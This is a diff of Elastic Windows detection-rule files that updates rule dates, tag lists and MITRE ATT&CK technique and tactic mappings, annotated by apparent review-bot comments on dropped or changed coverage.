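Review bot: The re-added Command and Control entry maps only the parent technique T1071, whereas the removed block also carried the T1071.001 Web Protocols sub-technique, so the hunk loses granularity rather than merely reordering entries. If the sub-technique was dropped because the query does not distinguish protocols, that is fine; otherwise re-add a `[[rule.threat.technique.subtechnique]]` table with `id = "T1071.001"` under T1071. The dllhost counterpart in the previous file section also adds T1071 without a sub-technique, so the two rules are at least consistent with each other.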
@@ -95,14 +95,33 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" +[[rule.threat.technique.subtechnique]] +id = "T1127.002" +name = "ClickOnce" +reference = "https://attack.mitre.org/techniques/T1127/002/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml b/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml index 236dce5f9bd..83c9d170fec 100644 --- a/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml +++ b/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -91,14 +91,18 @@ file where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_wsl_bash_exec.toml b/rules/windows/defense_evasion_wsl_bash_exec.toml index f0dae674a7e..5e040493bbb 100644 --- a/rules/windows/defense_evasion_wsl_bash_exec.toml +++ b/rules/windows/defense_evasion_wsl_bash_exec.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,19 +64,7 @@ references = [ risk_score = 21 rule_id = "3e0eeb75-16e8-4f2f-9826-62461ca128b7" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -103,31 +91,18 @@ process where host.os.type == "windows" and event.type : "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml index 3fbc2682614..2c23fc934b5 100644 --- a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml +++ b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,16 +89,3 @@ process where host.os.type == "windows" and event.type : "start" and ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_wsl_kalilinux.toml b/rules/windows/defense_evasion_wsl_kalilinux.toml index 1d34d559fbf..9c6fefe207c 100644 --- a/rules/windows/defense_evasion_wsl_kalilinux.toml 
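Review bot: The `@@ -89,16 +89,3 @@` hunk for defense_evasion_wsl_enabled_via_dism.toml deletes the file's only `[[rule.threat]]` block, leaving the rule with no ATT&CK mapping at all, and the diff shows no tags hunk for this file between the `updated_date` hunk and this one, so any `Tactic:` entry still present in its `tags` line now has no corresponding tactic in `rule.threat`. Either a replacement mapping or a matching edit to `tags` looks necessary; if a rule with an empty threat list is intended, that is worth stating in the PR description so it is not read as an accidental deletion.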
+++ b/rules/windows/defense_evasion_wsl_kalilinux.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ references = ["https://learn.microsoft.com/en-us/windows/wsl/wsl-config"] risk_score = 73 rule_id = "dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -100,14 +87,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" +[[rule.threat.technique.subtechnique]] +id = "T1564.006" +name = "Run Virtual Instance" +reference = "https://attack.mitre.org/techniques/T1564/006/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_wsl_registry_modification.toml b/rules/windows/defense_evasion_wsl_registry_modification.toml index ca02fcc756a..aaf9f735f05 100644 --- a/rules/windows/defense_evasion_wsl_registry_modification.toml +++ b/rules/windows/defense_evasion_wsl_registry_modification.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -90,19 +90,13 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/discovery_active_directory_webservice.toml b/rules/windows/discovery_active_directory_webservice.toml index 56600c5238b..8f2800ee80d 100644 --- a/rules/windows/discovery_active_directory_webservice.toml +++ b/rules/windows/discovery_active_directory_webservice.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/31" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,14 +83,18 @@ Active Directory Web Service (ADWS) facilitates querying Active Directory (AD) o [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_ad_explorer_execution.toml b/rules/windows/discovery_ad_explorer_execution.toml index 52e76151aca..7b4a261ca72 100644 --- a/rules/windows/discovery_ad_explorer_execution.toml +++ b/rules/windows/discovery_ad_explorer_execution.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,44 +83,33 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" - -[[rule.threat.technique]] -id = "T1018" -name = "Remote System Discovery" -reference = "https://attack.mitre.org/techniques/T1018/" [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.002" name = "Domain Groups" reference = "https://attack.mitre.org/techniques/T1069/002/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" - [[rule.threat.technique]] id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_adfind_command_activity.toml b/rules/windows/discovery_adfind_command_activity.toml index 154f036722d..eb934734102 100644 --- a/rules/windows/discovery_adfind_command_activity.toml +++ b/rules/windows/discovery_adfind_command_activity.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -104,10 +104,6 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" [[rule.threat.technique]] id = "T1018" @@ -118,30 +114,28 @@ reference = "https://attack.mitre.org/techniques/T1018/" id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.002" name = "Domain Groups" reference = "https://attack.mitre.org/techniques/T1069/002/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" - [[rule.threat.technique]] id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_command_system_account.toml b/rules/windows/discovery_command_system_account.toml index 03d5ecdf531..98ab72dd698 100644 --- a/rules/windows/discovery_command_system_account.toml +++ b/rules/windows/discovery_command_system_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/05/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -55,16 +55,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -96,31 +87,18 @@ not (process.parent.name : "cmd.exe" and process.working_directory : "C:\\Progra [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml b/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml index 885e2d7cfcf..ef606a7f6e7 100644 --- a/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml 
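Review bot: The `@@ -96,31 +87,18 @@` hunk deletes the whole second `[[rule.threat]]` block (T1078.003 Local Accounts under Privilege Escalation) together with the `"Tactic: Privilege Escalation"` tag, but nothing in the commit records why that coverage is no longer wanted for a rule that, judging by its filename, is about discovery commands executed under the SYSTEM account. Tags and tactics now agree, so the tactic/tag consistency check added with this series will pass; the open question is whether the ATT&CK coverage reduction is intended rather than a side effect of making the test green. A one-line rationale in the commit body or PR description would let the next reviewer of navigator coverage understand the drop without re-deriving it.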
+++ b/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/27" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,19 +93,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1018" -name = "Remote System Discovery" -reference = "https://attack.mitre.org/techniques/T1018/" [[rule.threat.technique]] id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_high_number_ad_properties.toml b/rules/windows/discovery_high_number_ad_properties.toml index ba1b6f16be2..9bb71b502f5 100644 --- a/rules/windows/discovery_high_number_ad_properties.toml +++ b/rules/windows/discovery_high_number_ad_properties.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/29" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -85,14 +85,28 @@ any where host.os.type == "windows" and event.code == "4662" and not winlog.even [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_host_public_ip_address_lookup.toml b/rules/windows/discovery_host_public_ip_address_lookup.toml index 70ce393aac1..5db11daaac7 100644 --- a/rules/windows/discovery_host_public_ip_address_lookup.toml +++ b/rules/windows/discovery_host_public_ip_address_lookup.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -55,19 +55,7 @@ references = ["https://attack.mitre.org/techniques/T1016/"] risk_score = 73 rule_id = "642ce354-4252-4d43-80c9-6603f16571c1" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Command and Control", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -131,31 +119,18 @@ network where host.os.type == "windows" and dns.question.name != null and proces [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" +[[rule.threat.technique.subtechnique]] +id = "T1016.001" +name = "Internet Connection Discovery" +reference = "https://attack.mitre.org/techniques/T1016/001/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.004" -name = "DNS" -reference = "https://attack.mitre.org/techniques/T1071/004/" - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/discovery_posh_invoke_sharefinder.toml b/rules/windows/discovery_posh_invoke_sharefinder.toml index 71301265659..b0a36b60dc8 100644 
--- a/rules/windows/discovery_posh_invoke_sharefinder.toml +++ b/rules/windows/discovery_posh_invoke_sharefinder.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/17" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -114,16 +114,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Collection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: PowerShell Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] timestamp_override = "event.ingested" type = "query" 
@@ -146,51 +137,16 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1039" -name = "Data from Network Shared Drive" -reference = "https://attack.mitre.org/techniques/T1039/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/discovery_posh_suspicious_api_functions.toml b/rules/windows/discovery_posh_suspicious_api_functions.toml index 4fa1272e100..4ab7a7dd03b 100644 --- a/rules/windows/discovery_posh_suspicious_api_functions.toml +++ b/rules/windows/discovery_posh_suspicious_api_functions.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/13" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
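Review bot: The `@@ -146,51 +137,16 @@` hunk removes both the Execution mapping (T1059.001 PowerShell, T1106 Native API) and the Collection mapping (T1039) from a rule whose only listed data source is PowerShell script block logging, leaving Discovery/T1135 alone; the same removal is made in discovery_posh_suspicious_api_functions at that file's `@@ -195,46 +202,10 @@` hunk. This is internally consistent with the tag changes in the preceding tags hunks, so the new tactic/tag check should pass for both rules. Whether the other `*_posh_*` rules in the repository still map to T1059.001 is not visible here; if they do, applying the same convention uniformly, or stating it in the PR description, would avoid mixed Execution coverage for the PowerShell data source.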
@@ -106,16 +106,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Collection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: PowerShell Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] timestamp_override = "event.ingested" type = "query" @@ -165,25 +156,41 @@ case_insensitive = true value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" reference = "https://attack.mitre.org/techniques/T1069/001/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1087/001/" +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" [[rule.threat.technique]] id = "T1135" 
@@ -195,46 +202,10 @@ id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1039" -name = "Data from Network Shared Drive" -reference = "https://attack.mitre.org/techniques/T1039/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/discovery_whoami_command_activity.toml b/rules/windows/discovery_whoami_command_activity.toml index 0c166da5fd0..14d4432265c 100644 --- a/rules/windows/discovery_whoami_command_activity.toml +++ b/rules/windows/discovery_whoami_command_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "system", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -117,14 +117,18 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml b/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml index 74799bd0dbd..d025ed0e6f3 100644 --- a/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml +++ b/rules/windows/execution_apt_solarwinds_backdoor_child_cmd_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -67,21 +67,7 @@ references = [ risk_score = 47 rule_id = "d72e33fc-6e91-42ff-ac8b-e573268c5a87" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -100,10 +86,12 @@ process.parent.name: ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -114,27 +102,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" -[[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - 
